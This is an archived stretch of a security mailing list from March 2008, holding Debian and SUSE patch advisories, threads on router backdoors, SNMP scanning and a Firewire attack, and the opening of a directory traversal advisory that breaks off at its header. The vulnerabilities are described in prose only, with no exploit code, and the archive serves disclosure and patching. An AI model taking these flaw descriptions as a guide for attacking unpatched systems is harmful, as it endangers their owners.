http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-386_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2446 d0f3f731301d12a7e83e0adc5e6faab5 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-586tsc_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2452 448ea77ae78b84b31074c06310abff2d http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-686_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2454 51c30ec77e9345f6eb930a2684cc72f9 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-686-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2466 630fcf555d96bbefe36adc031b1590dd http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k6_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2462 1f0c32839c6fac5010d7a37bd29ac335 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k7_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2458 fde4680c9802476653d87385f7553110 
http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-4-k7-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 2466 b429be79430479aa6195e9be4df2df32 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-386_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 147580 741b00a1dd08f0a3ec11807b5b5e0d21 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 164966 3608c1954937b7c2a562c5e7cec9c82a http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-686-smp_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 168700 f4292765662e2f76d9a2e18af8052122 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 163394 cde18e20701333deb222482a6bacd7ab http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-3-k7-smp_0.3.7-1sarge1_i386.deb Size/MD5 checksum: 167226 488d6c27c43fe4e6b39d3c2d8ee54be9 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-386_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 147744 f4e889628f1479ca845848c374ba94d4 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-686_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 165342 2d7a7d95cd8659cbae4a293ed5247443 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-686-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 169666 5ab7867f5d9fa479e8a8f96cd6fa9fc8 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-k7_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 163754 ac42725375d4e828b4220d84f7f92ef7 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.6.8-4-k7-smp_0.3.7-1sarge3_i386.deb Size/MD5 checksum: 168080 6dbbcfbcef54fcef4106675d84bf75c1 ia64 architecture (Intel ia64) 
http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8840 175694ae0a7e277237c50afe60bc0b62 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 17044422 41b3807bc4e7c2487d51784d1e6da20d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 244804 c7ddf4d27bbcc7a65f227a8f39960789 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8824 07f37c5408cec8fb777ca18746a5a1bc http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-build-2.4.27-4_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 9044 d677c2765ec285cd2ae65fe376657e10 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-itanium-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 244958 285f20f2ee3f7ec6246ae0799a5a3e1d http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 243766 e10f65174982b0fad0bb6cb0bdb96eae http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 16683002 41d6e31c8d9ab4a72f5c536bf4d2db7f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-itanium_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8808 28ea0d2a22689cdf78903dfe8c880b82 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 8850 8f3e1a627d35cded29666e6f17c7952c http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-mckinley-smp_2.4.27-10sarge7_ia64.deb Size/MD5 
checksum: 16990744 34ae5f2398e380b0d0b5b66ce005014f http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-image-2.4.27-4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 16636002 52d9ee8a8b36a7290873fa7234d6a6b7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 4691092 627c0ebf4a1cd7207abd5e7dc4dbf1c2 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-ia64/kernel-headers-2.4.27-4-mckinley_2.4.27-10sarge7_ia64.deb Size/MD5 checksum: 243636 3de8343d803a316d83a05518d7ccbca3 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_ia64.deb Size/MD5 checksum: 23668 fa7dde0df4892ae3ecf13e7ef48eefb5 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 110608 97b5054f3442426ecda36000e460d1d7 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 94792 a7add54463e7eebe42d0e1209b39ed16 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 487606 d961d1c7f08a33c5d3f192ff909bac5a http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_ia64.deb Size/MD5 checksum: 64004 e7c35fe3a0240bd3a36fe90790d2dd4c m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme16x_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2395408 93f0eb4bb3728673de2dcca48b1f6321 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mac_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2476904 e6435630d84030f7cacd23093a6653eb http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-atari_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2543798 80826caca0dc4c439e4b2d3459adff6c 
http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-mvme147_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2323548 47a5c2b13d0ca4c57b5f6504f5b0f4a7 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-q40_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2260928 3b2ad7134a31d80224924c6ac3c715d1 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-amiga_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2636594 01865c402c1eabfdcafd872b9e513510 http://security.debian.org/pool/updates/main/k/kernel-image-2.4.27-m68k/kernel-image-2.4.27-bvme6000_2.4.27-3sarge7_m68k.deb Size/MD5 checksum: 2393294 b610a211ef03a3e2a82f38468672c917 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_m68k.deb Size/MD5 checksum: 17794 398b6bccc2ef8df7eef83b434793fb4c http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 95102 335230b6c3f37d4a0447bf02dd3d766f http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 82852 33044d3d1f33772cabadf35f44b5a24c http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 457390 ca7a6f7f524d90a2471e6f06b61c6469 http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_m68k.deb Size/MD5 checksum: 55444 7226ed9f01e5a5be6e5d8f6ac193379a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 4763652 25f504369798f853722d8f63317bda53 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 7223516 6a1496ab421673c1f8edceb956b3294e 
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-ip22_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 3879916 f569ca2cb1e0fb6684d25fbab4a3d153 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-ip22_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 3878204 d3b6143706a6f8459b1c5b180645b103 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_mips.deb Size/MD5 checksum: 21614 17a387f7eeb5ec819d702f47cd6373b6 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 102282 5fb38a6229d753605225396f90b620ca http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 79810 e44f473d8d65c281bfa466b58b772185 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 469842 4ffcd8c522c5680ed07305433fe6391f http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_mips.deb Size/MD5 checksum: 58210 65e27c3a3cbae0d69dc371cced174a72 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/mips-tools_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 21948 e10b5a0be635ce80df14c29b754738f2 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-cobalt_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4112190 c6c565011042090ab2158a8d75bdaf4f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r5k-lasat_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 2144980 7e3cffbe800573df5c141c7655491351 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-xxs1500_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4681682 2e22969824ec3e0a37b2b7eed79552dd 
http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r3k-kn02_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 3042410 47d02daf465a611c75d73fab149fd22f http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-r4k-kn04_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 3002862 f9374af85983392e1229bad8980cbe10 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-image-2.4.27-sb1-swarm-bn_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 7049414 26eb406fb10b1f1d2919d23c9731dc88 http://security.debian.org/pool/updates/main/k/kernel-patch-2.4.27-mips/kernel-headers-2.4.27_2.4.27-10.sarge4.040815-4_mipsel.deb Size/MD5 checksum: 4688080 00d80aacdd7585dbc5eecae45528eb17 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 99406 cc6e5fbe3876cc14079e45cc872edbd7 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 78408 f3f4f7ade9629d7cf125308da3e98e29 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 465738 1a6d8ae53fafc23f75db2e4bdce116dc http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_mipsel.deb Size/MD5 checksum: 58580 750f1d0ab9127abccc930cdab161460f powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-headers-2.4.27-powerpc_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 4803418 2895c2cc6681996860c5cbaac5b34e2b http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-powerpc-smp_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 160134 89fe366843d1796419d9163fb78e9f18 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.4.27/kernel-build-2.4.27-apus_2.4.27-10sarge7_powerpc.deb Size/MD5 checksum: 146276 
These files will probably be moved into the oldstable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ sarge/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/sarge/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHz6FThuANDBmkLRkRAgb/AJ98Nw2MnfF7vwRnBvvekwutEkR4ggCbBzGH
xgae8yQuo7Fy9adwNnZrn0I=
=zIeD
-----END PGP SIGNATURE-----

From chedder1 at gmail.com Thu Mar 6 09:21:53 2008
From: chedder1 at gmail.com (chedder1 at gmail.com)
Date: Thu, 6 Mar 2008 01:21:53 -0800
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
Message-ID: <20080306092153.GA1626@chaotica>

COULD, this article makes no specific claims. the chinese government COULD have an audio recording device hidden inside your asshole at this very moment.

On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote:
> http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From ivanhec at gmail.com Thu Mar 6 09:46:37 2008
From: ivanhec at gmail.com (Ivan .)
Date: Thu, 6 Mar 2008 20:46:37 +1100
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <20080306092153.GA1626@chaotica>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
 <20080306092153.GA1626@chaotica>
Message-ID: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com>

so what? It doesn't have to make specific ascertains.
The fact of the matter is that government sponsored corporate/industrial espionage happens all the time.

Echelon spy network revealed
http://news.bbc.co.uk/1/hi/world/503224.stm

Echelon: Government spying breeds business distrust
http://news.zdnet.co.uk/itmanagement/0,1000000308,2079881,00.htm

Update: America uses Echelon to spy on Britain
http://news.zdnet.co.uk/security/0,1000000189,2079921,00.htm

On Thu, Mar 6, 2008 at 8:21 PM, wrote:
> COULD, this article makes no specific claims. the chinese government COULD have an audio recording device hidden inside your asshole at this very moment.
>
> On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote:
> > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html

From thomas at suse.de Thu Mar 6 10:07:28 2008
From: thomas at suse.de (Thomas Biege)
Date: Thu, 06 Mar 2008 11:07:28 +0100
Subject: [Full-disclosure] SUSE Security Announcement: cups (SUSE-SA:2008:012)
Message-ID: <47cfc260.jSsrHiJh+tKsIpNG%thomas@suse.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

______________________________________________________________________________

                        SUSE Security Announcement

        Package:                cups
        Announcement ID:        SUSE-SA:2008:012
        Date:                   Thu, 06 Mar 2008 11:00:00 +0000
        Affected Products:      SUSE LINUX 10.1
                                openSUSE 10.2
                                openSUSE 10.3
                                SuSE Linux Enterprise Server 8
                                SUSE SLES 9
                                Novell Linux Desktop 9
                                Open Enterprise Server
                                Novell Linux POS 9
                                SUSE Linux Enterprise Desktop 10 SP1
                                SUSE Linux Enterprise Server 10 SP1
        Vulnerability Type:     remote code execution
        Severity (1-10):        7
        SUSE Default Package:   yes
        Cross-References:       CVE-2008-0596
                                CVE-2008-0597
                                CVE-2008-0882

    Content of This Advisory:
        1) Security Vulnerability Resolved:
             remote code execution and multiple denial-of-service bugs
           Problem Description
        2) Solution or Work-Around
        3) Special Instructions and Notes
        4) Package Location and Checksums
        5) Pending Vulnerabilities, Solutions, and Work-Arounds:
            none
        6) Authenticity Verification and Additional Information

______________________________________________________________________________

1) Problem Description and Brief Discussion

   CUPS is the default printer system on SUSE Linux.

   The current security update of cups fixes a double-free bug in the
   function process_browse_data() that can lead to a remote denial-of-service
   by crashing cupsd or possibly to a remote code execution (CVE-2008-0882).
   The bug can only be exploited if cupsd listens to 631/udp by crafted UDP
   Browse packets.

   Additionally two remote denial-of-service bugs were fixed.
   The first one can be triggered via crafted IPP packets to use a pointer
   after it was freed (CVE-2008-0597) and the second issue is a memory-leak
   caused by a large number of requests to add and remove shared printers
   (CVE-2008-0596).

2) Solution or Work-Around

   No work-around known. Please install the new cups package.

3) Special Instructions and Notes

   Restart the cups server after the update.

4) Package Location and Checksums

   The preferred method for installing security updates is to use the YaST
   Online Update (YOU) tool. YOU detects which updates are required and
   automatically performs the necessary steps to verify and install them.
   Alternatively, download the update packages for your distribution manually
   and verify their integrity by the methods listed in Section 6 of this
   announcement. Then install the packages using the command

     rpm -Fhv

   to apply the update, replacing with the filename of the downloaded RPM
   package.

   Our maintenance customers are notified individually. The packages are
   offered for installation from the maintenance web:

   Open Enterprise Server
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   Novell Linux POS 9
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   Novell Linux Desktop 9
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   SuSE Linux Enterprise Server 8
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   SUSE Linux Enterprise Server 10 SP1
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   SUSE Linux Enterprise Desktop 10 SP1
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html
   SUSE SLES 9
     http://support.novell.com/techcenter/psdb/1addc7e3aa69e266f0fba3fdfef8b6c7.html

______________________________________________________________________________

5) Pending Vulnerabilities, Solutions, and Work-Arounds:

   Please consult our weekly summary report.

______________________________________________________________________________

6) Authenticity Verification and Additional Information

  - Announcement authenticity verification:

    SUSE security announcements are published via mailing lists and on Web
    sites. The authenticity and integrity of a SUSE security announcement is
    guaranteed by a cryptographic signature in each announcement. All SUSE
    security announcements are published with a valid signature.

    To verify the signature of the announcement, save it as text into a file
    and run the command

      gpg --verify

    replacing with the name of the file where you saved the announcement.
    The output for a valid signature looks like:

      gpg: Signature made using RSA key ID 3D25D3D9
      gpg: Good signature from "SuSE Security Team "

    where is replaced by the date the document was signed.

    If the security team's key is not contained in your key ring, you can
    import it from the first installation CD. To import the key, use the
    command

      gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc

  - Package authenticity verification:

    SUSE update packages are available on many mirror FTP servers all over the
    world. While this service is considered valuable and important to the free
    and open source software community, the authenticity and the integrity of
    a package needs to be verified to ensure that it has not been tampered
    with.

    There are two verification methods that can be used independently from
    each other to prove the authenticity of a downloaded file or RPM package:

    1) Using the internal gpg signatures of the rpm package
    2) MD5 checksums as provided in this announcement

    1) The internal rpm package signatures provide an easy way to verify the
       authenticity of an RPM package. Use the command

        rpm -v --checksig

       to verify the signature of the package, replacing with the filename of
       the RPM package downloaded. The package is unmodified if it contains a
       valid signature from build at suse.de with the key ID 9C800ACA.

       This key is automatically imported into the RPM database (on
       RPMv4-based distributions) and the gpg key ring of 'root' during
       installation. You can also find it on the first installation CD and at
       the end of this announcement.

    2) If you need an alternative means of verification, use the md5sum
       command to verify the authenticity of the packages. Execute the command

         md5sum

       after you downloaded the file from a SUSE FTP server or its mirrors.
       Then compare the resulting md5sum with the one that is listed in the
       SUSE security announcement. Because the announcement containing the
       checksums is cryptographically signed (by security at suse.de), the
       checksums show proof of the authenticity of the package if the
       signature of the announcement is valid. Note that the md5 sums
       published in the SUSE Security Announcements are valid for the
       respective packages only. Newer versions of these packages cannot be
       verified.

  - SUSE runs two security mailing lists to which any interested party may
    subscribe:

    opensuse-security at opensuse.org
        - General Linux and SUSE security discussion.
          All SUSE security announcements are sent to this list.
          To subscribe, send an e-mail to .

    opensuse-security-announce at opensuse.org
        - SUSE's announce-only mailing list.
          Only SUSE's security announcements are sent to this list.
          To subscribe, send an e-mail to .

    =====================================================================
    SUSE's security contact is or .
    The public key is listed below.
    =====================================================================
______________________________________________________________________________

    The information in this advisory may be distributed or reproduced,
    provided that the advisory is not modified in any way. In particular, the
    clear text signature should show proof of the authenticity of the text.

    SUSE Linux Products GmbH provides no warranties of any kind whatsoever
    with respect to the information contained in this security advisory.
Type Bits/KeyID     Date       User ID
pub  2048R/3D25D3D9 1999-03-06 SuSE Security Team
pub  1024D/9C800ACA 2000-10-19 SuSE Package Signing Key

From hackbunny at s0ftpj.org Thu Mar 6 13:15:23 2008
From: hackbunny at s0ftpj.org (KJK::Hyperion)
Date: Thu, 06 Mar 2008 14:15:23 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <47CEC5DF.2030000@s0ftpj.org>
References: <20080304085355.GA19264@suse.de>
 <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
 <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com>
 <47CEC5DF.2030000@s0ftpj.org>
Message-ID: <47CFEE6B.6080005@s0ftpj.org>

KJK::Hyperion wrote:
>> "Previous scanning worms, such as Code Red, spread via many threads,
>> each invoking connect() to probe random addresses.
> what the hell is this? visiting the iniquity of the applications upon
> the protocols? Winsock is probably the only API that lets you connect()
> asynchronously

I stand corrected! you can obviously use a non-blocking connect() with
select(), as well. You wacky socket APIs, what predicament will you not
get into!

From kurtdillard at msn.com Thu Mar 6 13:52:21 2008
From: kurtdillard at msn.com (Kurt Dillard)
Date: Thu, 6 Mar 2008 11:52:21 -0200
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com>
 <20080306092153.GA1626@chaotica>
 <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com>
Message-ID:

The assertions in the article and some of the comments in this thread sure look racist and xenophobic to me.
Why is it more risky that a product is produced in China than if it's made in Seattle, WA; Arlington, VA; Mexico City; London; or Berlin? The Chinese may have the skill and motivation to do this, but so does the USA, Russia, France, and most of the first world countries. You read about China breaking into US government computers, what you don't read about so much is the industrial espionage facilitated by Israeli and European governments to help firms within their countries to compete much less all of the spying the US does against the entire world. The risk is there, the risk may be higher with certain products and specific open source projects, but it's there regardless of where the product is made. On top of that, a very large portion of the designers, engineers, and programmers for high-tech products made in the USA are foreign nationals. Why would the Chinese government need to slip a back door into a router where all they could do is pick up encrypted network traffic when instead they could turn a kernel programmer at Apple, Sun, or Microsoft and get a backdoor slipped into the encryption algorithms and the kernel itself?

From staticrez at gmail.com Thu Mar 6 14:13:05 2008
From: staticrez at gmail.com (Static Rez)
Date: Thu, 6 Mar 2008 09:13:05 -0500
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <47CFEE6B.6080005@s0ftpj.org>
References: <20080304085355.GA19264@suse.de>
 <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
 <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com>
 <47CEC5DF.2030000@s0ftpj.org>
 <47CFEE6B.6080005@s0ftpj.org>
Message-ID: <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com>

Isn't it true that a TCP packet is typically 20 bytes, and a UDP packet about 8? This is minus any additional data that has been added to the packet.
If this is true, then depending on the size of the pipe you're sending the data through, and the amount of congestion there might be, a UDP packet would more easily and quickly hit its destination.

On Thu, Mar 6, 2008 at 8:15 AM, KJK::Hyperion wrote:
> KJK::Hyperion wrote:
> >> "Previous scanning worms, such as Code Red, spread via many threads,
> >> each invoking connect() to probe random addresses.
> > what the hell is this? visiting the iniquity of the applications upon
> > the protocols? Winsock is probably the only API that lets you connect()
> > asynchronously
>
> I stand corrected! you can obviously use a non-blocking connect() with
> select(), as well. You wacky socket APIs, what predicament will you not
> get into!

From vvandal at well.com Thu Mar 6 16:30:50 2008
From: vvandal at well.com (Vic Vandal)
Date: Thu, 6 Mar 2008 08:30:50 -0800 (PST)
Subject: [Full-disclosure] CarolinaCon-2008, March 28th-30th, full agenda posted
In-Reply-To:
References:
Message-ID:

Final message about the upcoming Con in the Raleigh/Durham/Chapel Hill area of NC.

Full talk abstracts and speaker bios are now online:
http://www.carolinacon.org/lineup.html

Other side event details are forthcoming.

Countdown = three weeks.
Peace,
Vic

From dancho.danchev at gmail.com Thu Mar 6 16:12:54 2008
From: dancho.danchev at gmail.com (Dancho Danchev)
Date: Thu, 6 Mar 2008 08:12:54 -0800
Subject: [Full-disclosure] More CNET Sites Under IFRAME Attack
Message-ID:

With the recent IFRAME injection attack targeting ZDNet Asia, by abusing the site's search engine caching capabilities in a combination with the lack of input sanitization, several more CNET Networks' web properties besides ZDNet Asia, namely, TV.com, News.com and MySimon.com are currently getting targeted using the same technique to inject the IFRAMEs and have the sites cache and locally host the results.

The following assessment outlines the IPs and domains used in the IFRAMEs, the domains and IPs hosting the rogue anti-virus and anti-spyware applications, as well as the detection rates of the applications.

http://ddanchev.blogspot.com/2008/03/more-cnet-sites-under-iframe-attack.html

Regards
--
Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev

From Larry at larryseltzer.com Thu Mar 6 17:50:47 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Thu, 6 Mar 2008 12:50:47 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <20080305193745.A25582@gwyn.tux.org>
References: <1204732416.6997.53.camel@b4byl0n>
 <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
 <20080305193745.A25582@gwyn.tux.org>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local>

>>Roger, you should note that Adam's "Hit by a Bus" paper includes information about how Linux users can load their OS' Firewire driver in a way that should disallow physical memory DMA access, and close this attack vector.

What are the implications for firewire device compatibility of doing this?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

From aluigi at autistici.org Thu Mar 6 18:18:40 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Thu, 6 Mar 2008 19:18:40 +0100
Subject: [Full-disclosure] Directory traversal in MicroWorld eScan Server 9.0.742.98
Message-ID: <20080306191840.cf2888e4.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  MicroWorld eScan Server (aka eScan Management Console)
              http://www.mwti.net
Versions:     <= 9.0.742.98
